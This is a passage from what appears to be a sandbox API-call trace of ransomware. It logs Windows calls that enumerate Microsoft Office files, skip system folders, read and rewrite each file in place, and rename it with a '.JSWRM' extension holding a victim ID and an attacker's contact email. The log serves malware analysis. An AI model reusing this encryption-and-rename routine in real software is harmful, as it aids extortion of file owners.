"c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl089.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL089.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl089.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0138.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0138.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0138.594] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d33f7b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d33f7b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d3659fb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1aaea, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL090.XML", cAlternateFileName="")) returned 1 [0138.594] lstrcmpiW (lpString1="PGLBL090.XML", lpString2=".") returned 1 [0138.594] lstrcmpiW (lpString1="PGLBL090.XML", lpString2="..") returned 1 [0138.594] lstrcmpiW (lpString1="PGLBL090.XML", lpString2="...") returned 1 [0138.594] lstrcmpiW (lpString1="PGLBL090.XML", lpString2="windows") returned -1 [0138.594] lstrcmpiW (lpString1="PGLBL090.XML", lpString2="recovery") returned -1 [0138.594] lstrcmpiW (lpString1="PGLBL090.XML", lpString2="perflogs") returned 1 [0138.594] lstrcmpiW (lpString1="PGLBL090.XML", lpString2="documents and settings") returned 1 [0138.594] lstrcmpiW (lpString1="PGLBL090.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.594] lstrcmpiW (lpString1="PGLBL090.XML", lpString2="system volume information") returned -1 [0138.594] lstrcmpiW (lpString1="PGLBL090.XML", lpString2="msocache") returned 1 [0138.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0138.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL090.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL090.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL090.XML", lpUsedDefaultChar=0x0) returned 12 [0138.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0138.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0138.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL090.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL090.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL090.XML", lpUsedDefaultChar=0x0) returned 12 [0138.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0138.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0138.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0138.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0138.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL090.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl090.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.595] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=109290) returned 1 [0138.595] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1aae0) returned 0x2501e8 [0138.595] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1aae0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1aae0, lpOverlapped=0x0) returned 1 [0138.737] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.737] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1aae0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1aae0, lpOverlapped=0x0) returned 1 [0138.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0138.737] CloseHandle (hObject=0x238) returned 1 [0138.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0138.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0138.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0138.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0138.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0138.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0138.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0138.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0138.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0138.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0138.738] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL090.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl090.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL090.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl090.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0138.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0138.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0138.740] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d3659fb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d3659fb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d7b7e3f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19a22, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL092.XML", cAlternateFileName="")) returned 1 [0138.740] lstrcmpiW (lpString1="PGLBL092.XML", lpString2=".") returned 1 [0138.740] lstrcmpiW (lpString1="PGLBL092.XML", lpString2="..") returned 1 [0138.740] lstrcmpiW (lpString1="PGLBL092.XML", lpString2="...") returned 1 [0138.740] lstrcmpiW (lpString1="PGLBL092.XML", lpString2="windows") returned -1 [0138.741] lstrcmpiW (lpString1="PGLBL092.XML", lpString2="recovery") returned -1 [0138.741] lstrcmpiW (lpString1="PGLBL092.XML", lpString2="perflogs") returned 1 [0138.741] lstrcmpiW (lpString1="PGLBL092.XML", lpString2="documents and settings") returned 1 [0138.741] lstrcmpiW (lpString1="PGLBL092.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.741] lstrcmpiW (lpString1="PGLBL092.XML", lpString2="system volume information") returned -1 [0138.741] lstrcmpiW (lpString1="PGLBL092.XML", lpString2="msocache") returned 1 [0138.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0138.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL092.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL092.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL092.XML", lpUsedDefaultChar=0x0) returned 12 [0138.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0138.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0138.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL092.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL092.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL092.XML", lpUsedDefaultChar=0x0) returned 12 [0138.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0138.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0138.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0138.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0138.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL092.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl092.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.746] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=104994) returned 1 [0138.746] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19a20) returned 0x2501e8 [0138.746] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x19a20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x19a20, lpOverlapped=0x0) returned 1 [0138.754] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.754] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x19a20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x19a20, lpOverlapped=0x0) returned 1 [0138.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0138.754] CloseHandle (hObject=0x238) returned 1 [0138.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0138.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0138.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0138.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0138.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0138.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0138.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0138.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0138.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0138.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0138.755] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL092.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl092.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL092.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl092.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0138.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0138.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0138.757] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d33f7b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d33f7b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d3659fb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb3da, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL093.XML", cAlternateFileName="")) returned 1 [0138.757] lstrcmpiW (lpString1="PGLBL093.XML", lpString2=".") returned 1 [0138.757] lstrcmpiW (lpString1="PGLBL093.XML", lpString2="..") returned 1 [0138.757] lstrcmpiW (lpString1="PGLBL093.XML", lpString2="...") returned 1 [0138.757] lstrcmpiW (lpString1="PGLBL093.XML", lpString2="windows") returned -1 [0138.757] lstrcmpiW (lpString1="PGLBL093.XML", lpString2="recovery") returned -1 [0138.757] lstrcmpiW (lpString1="PGLBL093.XML", lpString2="perflogs") returned 1 [0138.757] lstrcmpiW (lpString1="PGLBL093.XML", lpString2="documents and settings") returned 1 [0138.757] lstrcmpiW (lpString1="PGLBL093.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.757] lstrcmpiW (lpString1="PGLBL093.XML", lpString2="system volume information") returned -1 [0138.757] lstrcmpiW (lpString1="PGLBL093.XML", lpString2="msocache") returned 1 [0138.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0138.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL093.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL093.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL093.XML", lpUsedDefaultChar=0x0) returned 12 [0138.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0138.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0138.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL093.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL093.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL093.XML", lpUsedDefaultChar=0x0) returned 12 [0138.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0138.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0138.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0138.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0138.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL093.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl093.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.758] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=46042) returned 1 [0138.758] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb3d0) returned 0x27b348 [0138.758] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb3d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xb3d0, lpOverlapped=0x0) returned 1 [0138.763] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.763] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb3d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xb3d0, lpOverlapped=0x0) returned 1 [0138.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0138.763] CloseHandle (hObject=0x238) returned 1 [0138.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0138.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0138.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0138.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0138.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0138.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0138.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0138.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0138.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0138.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0138.764] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL093.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl093.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL093.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl093.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0138.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0138.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0138.765] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1f0c0a66, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1f0c0a66, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1fc39fa2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ccc2, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL095.XML", cAlternateFileName="")) returned 1 [0138.765] lstrcmpiW (lpString1="PGLBL095.XML", lpString2=".") returned 1 [0138.765] lstrcmpiW (lpString1="PGLBL095.XML", lpString2="..") returned 1 [0138.765] lstrcmpiW (lpString1="PGLBL095.XML", lpString2="...") returned 1 [0138.765] lstrcmpiW (lpString1="PGLBL095.XML", lpString2="windows") returned -1 [0138.765] lstrcmpiW (lpString1="PGLBL095.XML", lpString2="recovery") returned -1 [0138.765] lstrcmpiW (lpString1="PGLBL095.XML", lpString2="perflogs") returned 1 [0138.765] lstrcmpiW (lpString1="PGLBL095.XML", lpString2="documents and settings") returned 1 [0138.765] lstrcmpiW (lpString1="PGLBL095.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.765] lstrcmpiW (lpString1="PGLBL095.XML", lpString2="system volume information") returned -1 [0138.765] lstrcmpiW (lpString1="PGLBL095.XML", lpString2="msocache") returned 1 [0138.765] RtlAllocateHeap 